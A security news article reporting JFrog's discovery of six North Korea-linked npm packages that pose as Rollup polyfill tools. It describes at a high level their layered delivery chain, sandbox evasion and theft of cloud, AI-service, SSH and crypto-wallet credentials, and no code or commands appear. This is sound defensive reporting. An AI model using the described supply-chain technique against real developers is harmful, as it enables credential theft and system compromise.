North Korea-linked npm packages impersonate Rollup polyfill tools to steal developer secrets
JFrog identified six packages using layered delivery chains to harvest credentials for AWS, Azure, Claude, Gemini, and cryptocurrency wallets from developer workstations
July 3, 2026 – 4:55 pm
(Image by: Canva)
TL;DR
Six malicious npm packages mimicking Rollup polyfill tools stole developer credentials and enabled remote access in a campaign linked to North Korean threat actors.
Security researchers at JFrog have uncovered a set of malicious npm packages that impersonate legitimate Rollup polyfill tooling to steal developer credentials and gain remote access to compromised machines. The packages, named “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core”, closely resemble the genuine “rollup-plugin-polyfill-node” project in terms of:
- Description
- Repository metadata
- Package structure
All six packages have since been removed from the npm registry.
The attack utilizes a layered delivery chain designed to evade detection. This involves:
- First-stage packages installing hidden second-stage dependencies disguised as SVG utilities.
- These utilities then fetch a JSON object from a remote hosting service and execute its embedded payload.
JFrog notes that this structure, coupled with lookalike names, realistic metadata, and environment checks designed to avoid sandboxes and cloud development platforms, aligns with previous Lazarus-linked npm campaigns.
Once executed, the malware grants attackers both collection and control capabilities over the infected machine. It steals data from web browsers and cryptocurrency wallets, captures clipboard content periodically, harvests specific file types, targets developer tool configurations for VS Code, Windsurf, and Cursor, and exfiltrates credentials for AWS, Microsoft Azure, Google Gemini, Anthropic Claude, and SSH keys.
This campaign is not an isolated incident. In April, researchers at Panther documented a sustained Lazarus npm operation involving 108 malicious packages across 261 versions designed to deliver BeaverTail and OtterCookie—two known North Korean malware families associated with the Contagious Interview campaign. These latest packages share features with OtterCookie, including:
- Use of a forked keyboard and mouse control library for interactive remote terminal sessions, screenshot capture, and simulated user input on compromised Windows machines.
The recent disclosures highlight a broader trend of supply chain attacks targeting open-source package repositories. Separate reports from Checkmarx, SafeDep, and AWS researcher Chi Tran identify clusters of malicious packages across npm and PyPI that steal cloud credentials, cryptocurrency wallets, SSH keys, and developer secrets. Rollup plugins are frequently loaded from developer workstations and CI build pipelines—environments that have proven increasingly vulnerable to supply chain compromises, often holding access to sensitive assets including source code, API keys, and project secrets.